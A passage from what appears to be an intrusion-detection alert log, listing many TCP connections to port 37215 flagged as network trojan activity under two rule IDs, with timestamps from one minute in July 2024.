                  Source Port:44222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292133
                  SID:2835222
                  Source Port:57018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.527963
                  SID:2835222
                  Source Port:42038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.561522
                  SID:2835222
                  Source Port:48436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.596939
                  SID:2829579
                  Source Port:52908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.755859
                  SID:2829579
                  Source Port:36002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.260584
                  SID:2835222
                  Source Port:38936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.225054
                  SID:2829579
                  Source Port:46546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.948971
                  SID:2829579
                  Source Port:35100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.598272
                  SID:2835222
                  Source Port:48316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.843538
                  SID:2835222
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.554861
                  SID:2829579
                  Source Port:49738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781420
                  SID:2829579
                  Source Port:52510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.027883
                  SID:2829579
                  Source Port:40626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.891861
                  SID:2835222
                  Source Port:55088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464906
                  SID:2835222
                  Source Port:37658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.887400
                  SID:2835222
                  Source Port:52150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468804
                  SID:2835222
                  Source Port:51932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985938
                  SID:2829579
                  Source Port:36900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.765325
                  SID:2835222
                  Source Port:59916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527474
                  SID:2835222
                  Source Port:50242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.562285
                  SID:2835222
                  Source Port:56114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.619310
                  SID:2829579
                  Source Port:36704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551346
                  SID:2835222
                  Source Port:40666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.824141
                  SID:2829579
                  Source Port:50512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347150
                  SID:2829579
                  Source Port:41816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.973887
                  SID:2829579
                  Source Port:49704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.287695
                  SID:2829579
                  Source Port:51060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487648
                  SID:2835222
                  Source Port:40464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.988171
                  SID:2835222
                  Source Port:58594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145765
                  SID:2835222
                  Source Port:57270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171488
                  SID:2835222
                  Source Port:37896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2835222
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479455
                  SID:2829579
                  Source Port:44348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881343
                  SID:2829579
                  Source Port:54596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.121725
                  SID:2835222
                  Source Port:41342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868387
                  SID:2829579
                  Source Port:60028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.243364
                  SID:2835222
                  Source Port:35698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.807357
                  SID:2829579
                  Source Port:55458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.964382
                  SID:2829579
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.501573
                  SID:2829579
                  Source Port:37286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.618649
                  SID:2835222
                  Source Port:40034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634541
                  SID:2829579
                  Source Port:41060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.270809
                  SID:2829579
                  Source Port:48050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933807
                  SID:2829579
                  Source Port:46148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.790586
                  SID:2835222
                  Source Port:59214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.434490
                  SID:2835222
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.693034
                  SID:2835222
                  Source Port:45296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.556430
                  SID:2835222
                  Source Port:36728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.808477
                  SID:2829579
                  Source Port:60280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739922
                  SID:2829579
                  Source Port:59416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.525366
                  SID:2835222
                  Source Port:54678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004303
                  SID:2829579
                  Source Port:40670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.067488
                  SID:2835222
                  Source Port:57312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.108861
                  SID:2829579
                  Source Port:56360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785606
                  SID:2835222
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.180724
                  SID:2835222
                  Source Port:49644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.999286
                  SID:2829579
                  Source Port:56426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348137
                  SID:2835222
                  Source Port:35480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.426322
                  SID:2829579
                  Source Port:41782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.391743
                  SID:2835222
                  Source Port:50146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.867621
                  SID:2835222
                  Source Port:38386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.926462
                  SID:2835222
                  Source Port:59846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.507737
                  SID:2835222
                  Source Port:38884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751291
                  SID:2835222
                  Source Port:35304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.857451
                  SID:2829579
                  Source Port:55318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.087828
                  SID:2835222
                  Source Port:36656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281156
                  SID:2835222
                  Source Port:35624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.617704
                  SID:2829579
                  Source Port:39592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2829579
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013790
                  SID:2829579
                  Source Port:49922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.351462
                  SID:2829579
                  Source Port:58378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.826034
                  SID:2835222
                  Source Port:58242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639081
                  SID:2829579
                  Source Port:33718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.206516
                  SID:2835222
                  Source Port:56930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156575
                  SID:2829579
                  Source Port:34242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.046147
                  SID:2835222
                  Source Port:59900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.852225
                  SID:2829579
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.615687
                  SID:2829579
                  Source Port:55098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.409730
                  SID:2829579
                  Source Port:43708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.878785
                  SID:2835222
                  Source Port:57656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.594360
                  SID:2835222
                  Source Port:37726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2835222
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.437596
                  SID:2829579
                  Source Port:36656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.281691
                  SID:2835222
                  Source Port:39398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.941876
                  SID:2829579
                  Source Port:56772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.410594
                  SID:2835222
                  Source Port:33056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.914738
                  SID:2829579
                  Source Port:42830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:43218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.890469
                  SID:2835222
                  Source Port:35250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.358435
                  SID:2835222
                  Source Port:35030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497334
                  SID:2835222
                  Source Port:56482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.070223
                  SID:2829579
                  Source Port:48930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.359081
                  SID:2835222
                  Source Port:45020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.683298
                  SID:2829579
                  Source Port:50538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.834521
                  SID:2835222
                  Source Port:33966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.460068
                  SID:2829579
                  Source Port:36444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.957174
                  SID:2835222
                  Source Port:39520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2829579
                  Source Port:50652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.873647
                  SID:2829579
                  Source Port:36106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378488
                  SID:2835222
                  Source Port:55704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.134905
                  SID:2829579
                  Source Port:44744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.962556
                  SID:2835222
                  Source Port:40114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.330955
                  SID:2835222
                  Source Port:58126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.556329
                  SID:2829579
                  Source Port:57338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.885642
                  SID:2829579
                  Source Port:43212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2835222
                  Source Port:34850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.173254
                  SID:2829579
                  Source Port:46764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001692
                  SID:2829579
                  Source Port:42022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.489604
                  SID:2835222
                  Source Port:36702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850872
                  SID:2829579
                  Source Port:54532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.547817
                  SID:2835222
                  Source Port:38084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.439490
                  SID:2835222
                  Source Port:43170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.045134
                  SID:2829579
                  Source Port:60196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.803873
                  SID:2835222
                  Source Port:56818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807456
                  SID:2829579
                  Source Port:57462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.834313
                  SID:2829579
                  Source Port:44426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2835222
                  Source Port:54088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.929335
                  SID:2829579
                  Source Port:33076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373909
                  SID:2829579
                  Source Port:40782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.182396
                  SID:2835222
                  Source Port:54248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610911
                  SID:2829579
                  Source Port:51300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761249
                  SID:2835222
                  Source Port:52472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.326786
                  SID:2829579
                  Source Port:40280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144777
                  SID:2829579
                  Source Port:41576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.860758
                  SID:2835222
                  Source Port:37774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.466944
                  SID:2835222
                  Source Port:60388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.959831
                  SID:2835222
                  Source Port:59796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.103998
                  SID:2829579
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.004303
                  SID:2835222
                  Source Port:58710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.921577
                  SID:2829579
                  Source Port:50866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082444
                  SID:2829579
                  Source Port:41124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169904
                  SID:2835222
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171308
                  SID:2829579
                  Source Port:51102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.578603
                  SID:2829579
                  Source Port:47604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.382366
                  SID:2835222
                  Source Port:41520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2835222
                  Source Port:33276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624667
                  SID:2835222
                  Source Port:35910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566054
                  SID:2835222
                  Source Port:52822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.928939
                  SID:2829579
                  Source Port:50566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.612938
                  SID:2829579
                  Source Port:50188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595153
                  SID:2829579
                  Source Port:48180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453696
                  SID:2835222
                  Source Port:43196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.385980
                  SID:2829579
                  Source Port:53886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.752845
                  SID:2835222
                  Source Port:38790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.878263
                  SID:2835222
                  Source Port:56798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.778339
                  SID:2835222
                  Source Port:53826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.879237
                  SID:2835222
                  Source Port:45478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.828822
                  SID:2829579
                  Source Port:46468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2829579
                  Source Port:34018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810148
                  SID:2835222
                  Source Port:45354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.624081
                  SID:2829579
                  Source Port:46102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.392423
                  SID:2835222
                  Source Port:39978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.596849
                  SID:2829579
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.894191
                  SID:2835222
                  Source Port:59310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.345555
                  SID:2835222
                  Source Port:48498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758689
                  SID:2829579
                  Source Port:60190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081032
                  SID:2829579
                  Source Port:50890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879681
                  SID:2829579
                  Source Port:34634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.894192
                  SID:2829579
                  Source Port:54248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.736311
                  SID:2829579
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648548
                  SID:2829579
                  Source Port:50650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.407237
                  SID:2835222
                  Source Port:57348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2829579
                  Source Port:48330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177713
                  SID:2829579
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.444062
                  SID:2829579
                  Source Port:55338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.663247
                  SID:2835222
                  Source Port:51910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.953647
                  SID:2829579
                  Source Port:53202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.837652
                  SID:2835222
                  Source Port:53232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.917440
                  SID:2829579
                  Source Port:59580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.101728
                  SID:2829579
                  Source Port:58126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.524945
                  SID:2829579
                  Source Port:52448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878204
                  SID:2829579
                  Source Port:35294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.155413
                  SID:2835222
                  Source Port:56264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.712614
                  SID:2829579
                  Source Port:57274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.324840
                  SID:2829579
                  Source Port:35376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.309274
                  SID:2829579
                  Source Port:35082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.668884
                  SID:2835222
                  Source Port:50290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.886782
                  SID:2835222
                  Source Port:50982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366312
                  SID:2835222
                  Source Port:60902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959753
                  SID:2829579
                  Source Port:35114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.893160
                  SID:2835222
                  Source Port:54814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.155624
                  SID:2829579
                  Source Port:57838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134235
